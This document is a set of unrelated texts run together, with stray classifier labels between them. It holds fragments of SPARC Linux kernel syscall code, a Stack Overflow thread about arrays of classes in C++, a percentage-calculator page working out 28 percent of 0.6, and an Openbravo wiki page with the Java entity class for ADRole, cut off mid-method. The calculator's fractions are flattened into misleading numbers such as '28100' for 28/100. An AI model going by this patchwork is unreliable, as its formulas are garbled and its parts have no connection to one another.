PC=%lx nPC=%lx\n", regs->tpc, regs->tnpc); #endif } extern void check_pending(int signum); SYSCALL_DEFINE2(getdomainname, char __user *, name, int, len) { int nlen, err; if (len < 0) return -EINVAL; down_read(&uts_sem); nlen = strlen(utsname()->domainname) + 1; err = -EINVAL; if (nlen > len) goto out; err = -EFAULT; if (!copy_to_user(name, utsname()->domainname, nlen)) err = 0; out: up_read(&uts_sem); return err; } SYSCALL_DEFINE5(utrap_install, utrap_entry_t, type, utrap_handler_t, new_p, utrap_handler_t, new_d, utrap_handler_t __user *, old_p, utrap_handler_t __user *, old_d) { if (type < UT_INSTRUCTION_EXCEPTION || type > UT_TRAP_INSTRUCTION_31) return -EINVAL; if (new_p == (utrap_handler_t)(long)UTH_NOCHANGE) { if (old_p) { if (!current_thread_info()->utraps) { if (put_user(NULL, old_p)) return -EFAULT; } else { if (put_user((utrap_handler_t)(current_thread_info()->utraps[type]), old_p)) return -EFAULT; } } if (old_d) { if (put_user(NULL, old_d)) return -EFAULT; } return 0; } if (!current_thread_info()->utraps) { current_thread_info()->utraps = kzalloc((UT_TRAP_INSTRUCTION_31+1)*sizeof(long), GFP_KERNEL); if (!current_thread_info()->utraps) return -ENOMEM; current_thread_info()->utraps[0] = 1; } else { if ((utrap_handler_t)current_thread_info()->utraps[type] != new_p && current_thread_info()->utraps[0] > 1) { unsigned long *p = current_thread_info()->utraps; current_thread_info()->utraps = kmalloc((UT_TRAP_INSTRUCTION_31+1)*sizeof(long), GFP_KERNEL); if (!current_thread_info()->utraps) { current_thread_info()->utraps = p; return -ENOMEM; } p[0]--; current_thread_info()->utraps[0] = 1; memcpy(current_thread_info()->utraps+1, p+1, UT_TRAP_INSTRUCTION_31*sizeof(long)); } } if (old_p) { if (put_user((utrap_handler_t)(current_thread_info()->utraps[type]), old_p)) return -EFAULT; } if (old_d) { if (put_user(NULL, old_d)) return -EFAULT; } current_thread_info()->utraps[type] = (long)new_p; return 0; } asmlinkage long sparc_memory_ordering(unsigned long model, struct pt_regs *regs) { if (model >= 3) return -EINVAL; regs->tstate = (regs->tstate & ~TSTATE_MM) | (model << 14); return 0; } SYSCALL_DEFINE5(rt_sigaction, int, sig, const struct sigaction __user *, act, struct sigaction __user *, oact, void __user *, restorer, size_t, sigsetsize) { struct k_sigaction new_ka, old_ka; int ret; /* XXX: Don't preclude handling different sized sigset_t's. */ if (sigsetsize != sizeof(sigset_t)) return -EINVAL; if (act) { new_ka.ka_restorer = restorer; if (copy_from_user(&new_ka.sa, act, sizeof(*act))) return -EFAULT; } ret = do_sigaction(sig, act ? &new_ka : NULL, oact ? &old_ka : NULL); if (!ret && oact) { if (copy_to_user(oact, &old_ka.sa, sizeof(*oact))) return -EFAULT; } return ret; } /* * Do a system call from kernel instead of calling sys_execve so we * end up with proper pt_regs. */ int kernel_execve(const char *filename, char *const argv[], char *const envp[]) { long __res; register long __g1 __asm__ ("g1") = __NR_execve; register long __o0 __asm__ ("o0") = (long)(filename); register long __o1 __asm__ ("o1") = (long)(argv); register long __o2 __asm__ ("o2") = (long)(envp); asm volatile ("t 0x6d\n\t" "sub %%g0, %%o0, %0\n\t" "movcc %%xcc, %%o0, %0\n\t" : "=r" (__res), "=&r" (__o0) : "1" (__o0), "r" (__o1), "r" (__o2), "r" (__g1) : "cc"); return __res; }
__label__pos
0.965311
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. So I am trying to define a class and I am using another array of a different class to define it. //header file for Name.h class Name { string last; string first; }; //header file for Depositor.h class Depositor { Name name; string ssn;}; //header file for Account.h class Account { Depositor depositor; int acctnum; string type; double balance; }; //header file for Bank.h #include "Account.h" class Bank { Account account[]; //is this possible? int active_accts; }; When I am writing the cpp file I am running into a lot of problems! //example of mutator void Bank::setLastname(string lastname) { account.setLastname (lastname); } I didn't include the mutators and acessors that I wrote into the header file, but they are there and are public -- it won't compile. Can you help? Is it even valid to use an array of a class in Bank.h? share|improve this question 6 Answers 6 up vote 0 down vote accepted By declaring the value of the array in the header file and by adding a variable in the .cpp file you can solve all the problems and leave it as an array. //header file class Bank { Account account[100]; int active_accts; public: //mutator void setLastname (string,int); }; //the implementation file void Bank::setLastname (string last, int index) { account[index].setLastname(last); } this will solve all your problems share|improve this answer Is it even valid to use an array of a class in Bank.h? Yes, but it has to have a fixed dimension, e.g., Account account[3]; A type always has a fixed size in C++, and since an array member variable forms part of the class's size, you need to specify how many elements are in the array. If you don't know how many elements you are going to need, you can use a sequence container: std::vector<Account> account; share|improve this answer      Of course, a member array's size can be specified via a non-type template parameter. That's how Boost.Array works. –  In silico Feb 16 '11 at 3:23      @In: Sure, but then it still becomes part of the type; the array underlying a boost::array<T, 3> has a dimension of 3: it's known and fixed, and boost::array<T, 3> is a different type from boost::array<T, 4>. –  James McNellis Feb 16 '11 at 3:32      Right. The OP would still have to provide the size of the array at some time during compile time. –  In silico Feb 16 '11 at 3:36 Instead of arrays, consider using vectors. #include <vector> // ... class Bank { std::vector<Account> accounts; int active_accts; }; share|improve this answer      Yes, though active_accts was probably an attempt at managing the size, which vector handles for you, and it would then be dropped. –  Fred Nurk Feb 16 '11 at 1:35 • Account is not a nested class of Bank. Bank has a member data instance of type Account array. • You can have a primitive array member in a class, but you must specify the size of the array in the class definition: Account account[42];. The reason is that when you #include the class definition in another compilation unit, and then instantiate an instance of the class, the compiler needs to know what the size of that instance is. • It would be a wise idea to use std::vector<Account> rather than a primitive array. std::vector doesn't require committing to a particular size at construction; it grows dynamically. How come a std::vector doesn't require a size in the class definition, while a primitive array does? A std::vector holds as member a pointer to the elements on the heap. So the compiler does know the size of a std::vector; it uses the size of the pointer rather than the count of the elements. share|improve this answer      "I didn't include the mutators and acessors that I wrote into the header file, but they are there and are public" Quote the OP, so that mutes your first and third point, as he is using mutators, and not accessing the variables directly. Otherwise valid answer. –  dcousens Feb 16 '11 at 2:33      @Daniel True, fixed. Was a little sloppy in reading. :-S –  wilhelmtell Feb 16 '11 at 3:15 account is an array of Accounts, which means you would need to do something like account[0].setLastname(lastname); share|improve this answer you can't call setLastname(lastname) on the whole array. You need to call it on a specific instance of the Account class inside the array, like this: account[0].setLastname(lastname); On another note, you really should be storing an array of pointers to Account objects. share|improve this answer      as noted in other answers, a vector is actually a better solution. It allows for an expandable storage location. You still need pointer though. –  Scott M. Feb 16 '11 at 1:31      I don't see why you need pointers to Accounts. –  Fred Nurk Feb 16 '11 at 1:36      Depending on how big the Account class is and how many there are, you could fill up the stack pretty easily. It's better to have an array of pointers to Account objects that are allocated on the heap instead of on the stack. –  Scott M. Feb 16 '11 at 1:44 Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.554174
PercentageCalculator .pro Discount Percentage Fraction to % Decimal to % 28 percent of 0.6? Percentage Calculator What is % of Answer:  Percentage Calculator 2 is what percent of ? Answer: % Percentage Calculator 3 is % of what? Answer: We think you reached us looking for answers to questions like: What is 28 percent of 0.6? Or maybe: 28 percent of 0.6? See the detailed solutions to these problems below. How to work out percentages explained step-by-step Learn how to solve percentage problems through examples. In all the following questions consider that: Solution for 'What is 28% of 0.6?' Solution Steps The following question is of the type "How much X percent of W", where W is the whole amount and X is the percentage figure or rate". Let's say that you need to find 28 percent of 0.6. What are the steps? Step 1: first determine the value of the whole amount. We assume that the whole amount is 0.6. Step 2: determine the percentage, which is 28. Step 3: Convert the percentage 28% to its decimal form by dividing 28 into 100 to get the decimal number 0.28: 28100 = 0.28 Notice that dividing into 100 is the same as moving the decimal point two places to the left. 28.0 → 2.80 → 0.28 Step 4: Finally, find the portion by multiplying the decimal form, found in the previous step, by the whole amount: 0.28 x 0.6 = 0.168 (answer). The steps above are expressed by the formula: P = W × X%100 This formula says that: "To find the portion or the part from the whole amount, multiply the whole by the percentage, then divide the result by 100". The symbol % means the percentage expressed in a fraction or multiple of one hundred. Replacing these values in the formula, we get: P = 0.6 × 28100 = 0.6 × 0.28 = 0.168 (answer) Therefore, the answer is 0.168 is 28 percent of 0.6. Solution for '28 is what percent of 0.6?' The following question is of the type "P is what percent of W,” where W is the whole amount and P is the portion amount". The following problem is of the type "calculating the percentage from a whole knowing the part". Solution Steps As in the previous example, here are the step-by-step solution: Step 1: first determine the value of the whole amount. We assume that it is 0.6. (notice that this corresponds to 100%). Step 2: Remember that we are looking for the percentage 'percentage'. To solve this question, use the following formula: X% = 100 × PW This formula says that: "To find the percentage from the whole, knowing the part, divide the part by the whole then multiply the result by 100". This formula is the same as the previous one shown in a different way in order to have percent (%) at left. Step 3: replacing the values into the formula, we get: X% = 100 × 280.6 X% = 28000.6 X% = 4,666.67 (answer) So, the answer is 28 is 4,666.67 percent of 0.6 Solution for '0.6 is 28 percent of what?' The following problem is of the type "calculating the whole knowing the part and the percentage". Solution Steps: Step 1: first determine the value of the part. We assume that the part is 0.6. Step 2: identify the percent, which is 28. Step 3: use the formula below: W = 100 × PX% This formula says that: "To find the whole, divide the part by the percentage then multiply the result by 100". This formula is the same as the above rearranged to show the whole at left. Step 4: plug the values into the formula to get: W = 100 × 0.628 W = 100 × 0.021428571428571 W = 2.1428571428571 (answer) The answer, in plain words, is: 0.6 is 28% of 2.1428571428571. Sample percentage problems
__label__pos
0.996536
How to test private methods To test a method you need to execute it, but calling private methods directly can be hard or even impossible, depending on the programming language you use. In this article I?ll primarily speak about Python and Java, but the described techniques surely can be applied to many other languages (but I can?t be sure about all of them). What is a private method? Have you ever asked yourself, why do you even need private methods? You need private data to maintain consistency, but why private methods? Strictly speaking, you don?t. But they still be helpful at least for two major reasons: • You want to extract some code that works with private data; • You want to extract some code that doesn?t work with private data, but still doesn?t suit API (because user simple doesn?t care). While the first one prevents private data corruption, the second merely makes your API cleaner. Don?t test it Surprisingly, when I first came to Java programming and googled ?How to test private method in Java?, the most popular answer was something like ?Why do you want to test private methods? Users call public methods, test them instead?. Well, that sounds crazy for me. I surely can just ignore the fact that a public methods call a private one, just imagine that private method code is inlined, but that means that code of the private method will be tested again and again with every public method that calls the private one. In the following example you really want to test private method, not the two almost identical public ones. One can notice that some refactoring can allow me not to test the private method. That?s true and we will talk about it later. But testing _set_status without any changes is still clean and reasonable way to do. I don?t buy this ?don?t test private methods?. Just call it The simplest and most straightforward way to call a private method is, you know, call it. And that?s exactly what we do in Python and other languages that has private by convention (e. g. Perl). To ?just call it? in Java we need to change visibility of the method. The first way is to make method package private (no access modifier) and put tests into the same package. This is a fairly common practice, but you still might want (or already have) another code structure. The second way is to make method public. To let people know you still don?t want to call this method you can use @VisibleForTestingannotation from Guava or any other convention you like (that?s actually what Python and Perl do). By the way, IDEA totally understands that annotation and will warn you about using such public method outside of tests. Nested class You can also put a test class inside a tested one (at least in Java), but that doesn?t look great. You have to use the same file for both classes, and your production binaries will actually contain test code. Reflection In some languages reflections will do fine, in Ruby it?s that simple: But in Java such code is so heavy I gave up on idea of providing an example here. More than this, you have to abandon all cool stuff your favourite IDE does for you. Eliminate private Personally I prefer the ?just call it? method, and I like to use @VisibleForTesting in Java to make it happen. But let us talk again about refactoring that allows me avoiding testing private methods (by eliminating them). The point is to merge all private data and private methods into an object of another class that contains no private methods or data, but put the instance of that class into the only private attribute of the original class. Doesn?t sound simple, but it is, consider examples: Before: After: So now you can freely test EntityPrivateData, the only thing that remains private is data attribute. Like I said before, you actually don?t need private methods, only private data. The described method can be useful not only for testing private methods, but also for more expressive design of your software. You can use any number of such private data classes so they have more sense semantically, not only technically. For me, the most important thing about this pattern is that it proves that you technically can eliminate all private methods. But I still doubt that it?s reasonable to do it every time, your code can bloat without any significant benefit. This article was written with the help of Nikolay Rys. See also Testing private methods: easier than you think! – Axel Fontaine – Entrepreneur, Architect? Why make things simple when you can also make them hard and long-winded? Haven’t you always been dreaming of needing 10? axelfontaine.com How do I test a class that has private methods, fields or inner classes? How do I use JUnit to test a class that has internal private methods, fields or nested classes? It seems bad to change? stackoverflow.com No Responses Write a response
__label__pos
0.698237
Importing entries from one termbase into another one with different termbase definitions We created a brand new termbase for our team with MT 2021. We are now trying to import terms from our legacy termbase (also MT 2021) into the new, empty termbase. However, the termbase definitions of the two termbases are different.  How can I still get the data into the new termbase? So far, I have not been able to import a single term. Is there now way to import the fields that match and to leave the other fields blank so that we can edit them later? Sure there must be any other way than manually adding all the terms again. emoji Parents Reply Children No Data
__label__pos
0.729645
View source | Discuss this page | Page history | Printable version    Toolbox Main Page Upload file What links here Recent changes Help PDF Books Add page Show collection (0 pages) Collections help Search ERP/3.0/Developers Guide/Reference/Entity Model/ADRole This article is protected against manual editing because it is automatically generated from Openbravo meta-data. Learn more about writing and translating such documents. Back button.png   Back to ERP/3.0/Developers_Guide/Reference/Entity_Model#ADRole ADRole Define the role and add the client and organizations the role has access to. You can give users access to this role and modify the access of this role to windows, forms, processes and reports as well as tasks. If the Role User Level is Manual, the as Select Role for with Data Access Restrictions To the database table (AD_Role) of this entity. Properties Note: Property Column Constraints Type Description id* AD_Role_ID Mandatory Max Length: 32 java.lang.String The Role determines security and access a user who has this Role will have in the System. client AD_Client_ID Mandatory ADClient A Client is a company or a legal entity. You cannot share data between Clients. organization AD_Org_ID Mandatory Organization An organization is a unit of your client or legal entity - examples are store, department. You can share data between organizations. active IsActive Mandatory java.lang.Boolean There are two methods of making records unavailable in the system: One is to delete the record, the other is to de-activate the record. A de-activated record is not available for selection, but available for reporting. There are two reasons for de-activating and not deleting records: (1) The system requires the record for auditing purposes. (2) The record is referenced by other records. E.g., you cannot delete a Business Partner, if there are existing invoices for it. By de-activating the Business Partner you prevent it from being used in future transactions. creationDate Created Mandatory java.util.Date The Created field indicates the date that this record was created. createdBy CreatedBy Mandatory ADUser The Created By field indicates the user who created this record. updated Updated Mandatory java.util.Date The Updated field indicates the date that this record was updated. name# Name Mandatory Max Length: 60 java.lang.String A more descriptive identifier (that does need to be unique) of a record/document that is used as a default search option along with the search key (that is unique and mostly shorter). It is up to 60 characters in length. updatedBy UpdatedBy Mandatory ADUser The Updated By field indicates the user who updated this record. description Description Max Length: 255 java.lang.String A description is limited to 255 characters. userLevel UserLevel Mandatory Max Length: 60 java.lang.String The User Level field determines if users of this Role will have access to System level data, Organization level data, Client level data or Client and Organization level data. currency C_Currency_ID Currency Indicates the currency to be used when processing this document. approvalAmount AmtApproval java.math.BigDecimal The Approval Amount field indicates the amount limit this Role has for approval of documents. primaryTreeMenu AD_Tree_Menu_ID ADTree Tree Menu manual IsManual java.lang.Boolean The Manual check box indicates if the process will done manually. processNow Processing java.lang.Boolean When this field is set as 'Y' a process is being performed on this record. clientAdmin IS_Client_Admin Mandatory java.lang.Boolean Defines the role as an administrator of the client it belongs to. advanced IsAdvanced Mandatory java.lang.Boolean Automatic (non manual) advanced roles are granted with features checked as advanced. isrestrictbackend Isrestrictbackend Mandatory java.lang.Boolean If checked, this role will not have access to the backend (ERP). It will however have access to other applications (such as the WebPOS) forPortalUsers IsPortal Mandatory java.lang.Boolean If checked, this role will have a simplified (portal) interface, where it only has available the workspace widgets. portalAdmin IsPortalAdmin Mandatory java.lang.Boolean If checked, the Portal Role will have Portal Administrator privileges isWebServiceEnabled IsWebServiceEnabled Mandatory java.lang.Boolean If checked, web services will be able to obtain data for users with this role. It applies to both JSON REST and XML REST web services template IsTemplate Mandatory java.lang.Boolean Template is checked when the element is used as a template. recalculatePermissions Recalculatepermissions java.lang.Boolean This process recalculates role permissions, based on the role inheritance defined. Depending on the role type the behavior varies: - If the role is a template one, the permissions for the role will be recalculated and also propagated to every role which is currently inheriting from this template. - If the role is not marked as template, just the permissions for this role are recalculated. For details - http://wiki.openbravo.com/wiki/Role#Permissions_Inheritance aDAlertRecipientList ADAlertRecipient aDFormAccessList ADFormAccess aDPreferenceVisibleAtRoleList ADPreference aDProcessAccessList ADProcessAccess aDRoleInheritanceInheritFromList ADRoleInheritance aDRoleInheritanceList ADRoleInheritance aDRoleOrganizationList ADRoleOrganization aDTableAccessList ADTableAccess aDUserRolesList ADUserRoles aDWindowAccessList ADWindowAccess oBKMOWidgetClassAccessList OBKMO_WidgetClassAccess oBUIAPPProcessAccessList OBUIAPP_Process_Access obuiappViewRoleAccessList obuiapp_ViewRoleAccess Java Entity Class     /* ************************************************************************* * The contents of this file are subject to the Openbravo Public License * Version 1.1 (the "License"), being the Mozilla Public License * Version 1.1 with a permitted attribution clause; you may not use this * file except in compliance with the License. You may obtain a copy of * the License at http://www.openbravo.com/legal/license.html * Software distributed under the License is distributed on an "AS IS" * basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the * License for the specific language governing rights and limitations * under the License. * The Original Code is Openbravo ERP. * The Initial Developer of the Original Code is Openbravo SLU * All portions are Copyright (C) 2008-2019 Openbravo SLU * All Rights Reserved. * Contributor(s): ______________________________________. ************************************************************************ */ package org.openbravo.model.ad.access; import java.math.BigDecimal; import java.util.ArrayList; import java.util.Date; import java.util.List; import org.openbravo.base.structure.ActiveEnabled; import org.openbravo.base.structure.BaseOBObject; import org.openbravo.base.structure.ClientEnabled; import org.openbravo.base.structure.OrganizationEnabled; import org.openbravo.base.structure.Traceable; import org.openbravo.client.application.ViewRoleAccess; import org.openbravo.client.myob.WidgetClassAccess; import org.openbravo.model.ad.alert.AlertRecipient; import org.openbravo.model.ad.domain.Preference; import org.openbravo.model.ad.system.Client; import org.openbravo.model.ad.utility.Tree; import org.openbravo.model.common.currency.Currency; import org.openbravo.model.common.enterprise.Organization; /** * Entity class for entity ADRole (stored in table AD_Role). * * NOTE: This class should not be instantiated directly. To instantiate this * class the {@link org.openbravo.base.provider.OBProvider} should be used. */ public class Role extends BaseOBObject implements Traceable, ClientEnabled, OrganizationEnabled, ActiveEnabled { private static final long serialVersionUID = 1L; public static final String TABLE_NAME = "AD_Role"; public static final String ENTITY_NAME = "ADRole"; public static final String PROPERTY_ID = "id"; public static final String PROPERTY_CLIENT = "client"; public static final String PROPERTY_ORGANIZATION = "organization"; public static final String PROPERTY_ACTIVE = "active"; public static final String PROPERTY_CREATIONDATE = "creationDate"; public static final String PROPERTY_CREATEDBY = "createdBy"; public static final String PROPERTY_UPDATED = "updated"; public static final String PROPERTY_NAME = "name"; public static final String PROPERTY_UPDATEDBY = "updatedBy"; public static final String PROPERTY_DESCRIPTION = "description"; public static final String PROPERTY_USERLEVEL = "userLevel"; public static final String PROPERTY_CURRENCY = "currency"; public static final String PROPERTY_APPROVALAMOUNT = "approvalAmount"; public static final String PROPERTY_PRIMARYTREEMENU = "primaryTreeMenu"; public static final String PROPERTY_MANUAL = "manual"; public static final String PROPERTY_PROCESSNOW = "processNow"; public static final String PROPERTY_CLIENTADMIN = "clientAdmin"; public static final String PROPERTY_ADVANCED = "advanced"; public static final String PROPERTY_ISRESTRICTBACKEND = "isrestrictbackend"; public static final String PROPERTY_FORPORTALUSERS = "forPortalUsers"; public static final String PROPERTY_PORTALADMIN = "portalAdmin"; public static final String PROPERTY_ISWEBSERVICEENABLED = "isWebServiceEnabled"; public static final String PROPERTY_TEMPLATE = "template"; public static final String PROPERTY_RECALCULATEPERMISSIONS = "recalculatePermissions"; public static final String PROPERTY_ADALERTRECIPIENTLIST = "aDAlertRecipientList"; public static final String PROPERTY_ADFORMACCESSLIST = "aDFormAccessList"; public static final String PROPERTY_ADPREFERENCEVISIBLEATROLELIST = "aDPreferenceVisibleAtRoleList"; public static final String PROPERTY_ADPROCESSACCESSLIST = "aDProcessAccessList"; public static final String PROPERTY_ADROLEINHERITANCEINHERITFROMLIST = "aDRoleInheritanceInheritFromList"; public static final String PROPERTY_ADROLEINHERITANCELIST = "aDRoleInheritanceList"; public static final String PROPERTY_ADROLEORGANIZATIONLIST = "aDRoleOrganizationList"; public static final String PROPERTY_ADTABLEACCESSLIST = "aDTableAccessList"; public static final String PROPERTY_ADUSERROLESLIST = "aDUserRolesList"; public static final String PROPERTY_ADWINDOWACCESSLIST = "aDWindowAccessList"; public static final String PROPERTY_OBKMOWIDGETCLASSACCESSLIST = "oBKMOWidgetClassAccessList"; public static final String PROPERTY_OBUIAPPPROCESSACCESSLIST = "oBUIAPPProcessAccessList"; public static final String PROPERTY_OBUIAPPVIEWROLEACCESSLIST = "obuiappViewRoleAccessList"; public Role() { setDefaultValue(PROPERTY_ACTIVE, true); setDefaultValue(PROPERTY_MANUAL, true); setDefaultValue(PROPERTY_PROCESSNOW, false); setDefaultValue(PROPERTY_CLIENTADMIN, false); setDefaultValue(PROPERTY_ADVANCED, false); setDefaultValue(PROPERTY_ISRESTRICTBACKEND, false); setDefaultValue(PROPERTY_FORPORTALUSERS, false); setDefaultValue(PROPERTY_PORTALADMIN, false); setDefaultValue(PROPERTY_ISWEBSERVICEENABLED, false); setDefaultValue(PROPERTY_TEMPLATE, false); setDefaultValue(PROPERTY_RECALCULATEPERMISSIONS, false); setDefaultValue(PROPERTY_ADALERTRECIPIENTLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_ADFORMACCESSLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_ADPREFERENCEVISIBLEATROLELIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_ADPROCESSACCESSLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_ADROLEINHERITANCEINHERITFROMLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_ADROLEINHERITANCELIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_ADROLEORGANIZATIONLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_ADTABLEACCESSLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_ADUSERROLESLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_ADWINDOWACCESSLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_OBKMOWIDGETCLASSACCESSLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_OBUIAPPPROCESSACCESSLIST, new ArrayList<Object>()); setDefaultValue(PROPERTY_OBUIAPPVIEWROLEACCESSLIST, new ArrayList<Object>()); } @Override public String getEntityName() { return ENTITY_NAME; } public String getId() { return (String) get(PROPERTY_ID); } public void setId(String id) { set(PROPERTY_ID, id); } public Client getClient() { return (Client) get(PROPERTY_CLIENT); } public void setClient(Client client) { set(PROPERTY_CLIENT, client); } public Organization getOrganization() { return (Organization) get(PROPERTY_ORGANIZATION); } public void setOrganization(Organization organization) { set(PROPERTY_ORGANIZATION, organization); } public Boolean isActive() { return (Boolean) get(PROPERTY_ACTIVE); } public void setActive(Boolean active) { set(PROPERTY_ACTIVE, active); } public Date getCreationDate() { return (Date) get(PROPERTY_CREATIONDATE); } public void setCreationDate(Date creationDate) { set(PROPERTY_CREATIONDATE, creationDate); } public User getCreatedBy() { return (User) get(PROPERTY_CREATEDBY); } public void setCreatedBy(User createdBy) { set(PROPERTY_CREATEDBY, createdBy); } public Date getUpdated() { return (Date) get(PROPERTY_UPDATED); } public void setUpdated(Date updated) { set(PROPERTY_UPDATED, updated); } public String getName() { return (String) get(PROPERTY_NAME); } public void setName(String name) { set(PROPERTY_NAME, name); } public User getUpdatedBy() { return (User) get(PROPERTY_UPDATEDBY); } public void setUpdatedBy(User updatedBy) { set(PROPERTY_UPDATEDBY, updatedBy); } public String getDescription() { return (String) get(PROPERTY_DESCRIPTION); } public void setDescription(String description) { set(PROPERTY_DESCRIPTION, description); } public String getUserLevel() { return (String) get(PROPERTY_USERLEVEL); } public void setUserLevel(String userLevel) { set(PROPERTY_USERLEVEL, userLevel); } public Currency getCurrency() { return (Currency) get(PROPERTY_CURRENCY); } public void setCurrency(Currency currency) { set(PROPERTY_CURRENCY, currency); } public BigDecimal getApprovalAmount() { return (BigDecimal) get(PROPERTY_APPROVALAMOUNT); } public void setApprovalAmount(BigDecimal approvalAmount) { set(PROPERTY_APPROVALAMOUNT, approvalAmount); } public Tree getPrimaryTreeMenu() { return (Tree) get(PROPERTY_PRIMARYTREEMENU); } public void setPrimaryTreeMenu(Tree primaryTreeMenu) { set(PROPERTY_PRIMARYTREEMENU, primaryTreeMenu); } public Boolean isManual() { return (Boolean) get(PROPERTY_MANUAL); } public void setManual(Boolean manual) { set(PROPERTY_MANUAL, manual); } public Boolean isProcessNow() { return (Boolean) get(PROPERTY_PROCESSNOW); } public void setProcessNow(Boolean processNow) { set(PROPERTY_PROCESSNOW, processNow); } public Boolean isClientAdmin() { return (Boolean) get(PROPERTY_CLIENTADMIN); } public void setClientAdmin(Boolean clientAdmin) { set(PROPERTY_CLIENTADMIN, clientAdmin); } public Boolean isAdvanced() { return (Boolean) get(PROPERTY_ADVANCED); } public void setAdvanced(Boolean advanced) { set(PROPERTY_ADVANCED, advanced); } public Boolean isRestrictbackend() { return (Boolean) get(PROPERTY_ISRESTRICTBACKEND); } public void setRestrictbackend(Boolean isrestrictbackend) { set(PROPERTY_ISRESTRICTBACKEND, isrestrictbackend); } public Boolean isForPortalUsers() { return (Boolean) get(PROPERTY_FORPORTALUSERS); } public void setForPortalUsers(Boolean forPortalUsers) { set(PROPERTY_FORPORTALUSERS, forPortalUsers); } public Boolean isPortalAdmin() { return (Boolean) get(PROPERTY_PORTALADMIN); } public void setPortalAdmin(Boolean portalAdmin) { set(PROPERTY_PORTALADMIN, portalAdmin); } public Boolean isWebServiceEnabled() { return (Boolean) get(PROPERTY_ISWEBSERVICEENABLED); } public void setWebServiceEnabled(Boolean isWebServiceEnabled) { set(PROPERTY_ISWEBSERVICEENABLED, isWebServiceEnabled); } public Boolean isTemplate() { return (Boolean) get(PROPERTY_TEMPLATE); } public void setTemplate(Boolean template) { set(PROPERTY_TEMPLATE, template); } public Boolean isRecalculatePermissions() { return (Boolean) get(PROPERTY_RECALCULATEPERMISSIONS); } public void setRecalculatePermissions(Boolean recalculatePermissions) { set(PROPERTY_RECALCULATEPERMISSIONS, recalculatePermissions); } @SuppressWarnings("unchecked") public List<AlertRecipient> getADAlertRecipientList() { return (List<AlertRecipient>) get(PROPERTY_ADALERTRECIPIENTLIST); } public void setADAlertRecipientList(List<AlertRecipient> aDAlertRecipientList) { set(PROPERTY_ADALERTRECIPIENTLIST, aDAlertRecipientList); } @SuppressWarnings("unchecked") public List<FormAccess> getADFormAccessList() { return (List<FormAccess>) get(PROPERTY_ADFORMACCESSLIST); } public void setADFormAccessList(List<FormAccess> aDFormAccessList) { set(PROPERTY_ADFORMACCESSLIST, aDFormAccessList); } @SuppressWarnings("unchecked") public List<Preference> getADPreferenceVisibleAtRoleList() { return (List<Preference>) get(PROPERTY_ADPREFERENCEVISIBLEATROLELIST); } public void setADPreferenceVisibleAtRoleList(List<Preference> aDPreferenceVisibleAtRoleList) { set(PROPERTY_ADPREFERENCEVISIBLEATROLELIST, aDPreferenceVisibleAtRoleList); } @SuppressWarnings("unchecked") public List<ProcessAccess> getADProcessAccessList() { return (List<ProcessAccess>) get(PROPERTY_ADPROCESSACCESSLIST); } public void setADProcessAccessList(List<ProcessAccess> aDProcessAccessList) { set(PROPERTY_ADPROCESSACCESSLIST, aDProcessAccessList); } @SuppressWarnings("unchecked") public List<RoleInheritance> getADRoleInheritanceInheritFromList() { return (List<RoleInheritance>) get(PROPERTY_ADROLEINHERITANCEINHERITFROMLIST); } public void setADRoleInheritanceInheritFromList(List<RoleInheritance> aDRoleInheritanceInheritFromList) { set(PROPERTY_ADROLEINHERITANCEINHERITFROMLIST, aDRoleInheritanceInheritFromList); } @SuppressWarnings("unchecked") public List<RoleInheritance> getADRoleInheritanceList() { return (List<RoleInheritance>) get(PROPERTY_ADROLEINHERITANCELIST); } public void setADRoleInheritanceList(List<RoleInheritance> aDRoleInheritanceList) { set(PROPERTY_ADROLEINHERITANCELIST, aDRoleInheritanceList); } @SuppressWarnings("unchecked") public List<RoleOrganization> getADRoleOrganizationList() { return (List<RoleOrganization>) get(PROPERTY_ADROLEORGANIZATIONLIST); } public void setADRoleOrganizationList(List<RoleOrganization> aDRoleOrganizationList) { set(PROPERTY_ADROLEORGANIZATIONLIST, aDRoleOrganizationList); } @SuppressWarnings("unchecked") public List<TableAccess> getADTableAccessList() { return (List<TableAccess>) get(PROPERTY_ADTABLEACCESSLIST); } public void setADTableAccessList(List<TableAccess> aDTableAccessList) { set(PROPERTY_ADTABLEACCESSLIST, aDTableAccessList); } @SuppressWarnings("unchecked") public List<UserRoles> getADUserRolesList() { return (List<UserRoles>) get(PROPERTY_ADUSERROLESLIST); } public void setADUserRolesList(List<UserRoles> aDUserRolesList) { set(PROPERTY_ADUSERROLESLIST, aDUserRolesList); } @SuppressWarnings("unchecked") public List<WindowAccess> getADWindowAccessList() { return (List<WindowAccess>) get(PROPERTY_ADWINDOWACCESSLIST); } public void setADWindowAccessList(List<WindowAccess> aDWindowAccessList) { set(PROPERTY_ADWINDOWACCESSLIST, aDWindowAccessList); } @SuppressWarnings("unchecked") public List<WidgetClassAccess> getOBKMOWidgetClassAccessList() { return (List<WidgetClassAccess>) get(PROPERTY_OBKMOWIDGETCLASSACCESSLIST); } public void setOBKMOWidgetClassAccessList(List<WidgetClassAccess> oBKMOWidgetClassAccessList) { set(PROPERTY_OBKMOWIDGETCLASSACCESSLIST, oBKMOWidgetClassAccessList); } @SuppressWarnings("unchecked") public List<org.openbravo.client.application.ProcessAccess> getOBUIAPPProcessAccessList() { return (List<org.openbravo.client.application.ProcessAccess>) get(PROPERTY_OBUIAPPPROCESSACCESSLIST); } public void setOBUIAPPProcessAccessList(List<org.openbravo.client.application.ProcessAccess> oBUIAPPProcessAccessList) { set(PROPERTY_OBUIAPPPROCESSACCESSLIST, oBUIAPPProcessAccessList); } @SuppressWarnings("unchecked") public List<ViewRoleAccess> getObuiappViewRoleAccessList() { return (List<ViewRoleAccess>) get(PROPERTY_OBUIAPPVIEWROLEACCESSLIST); } public void 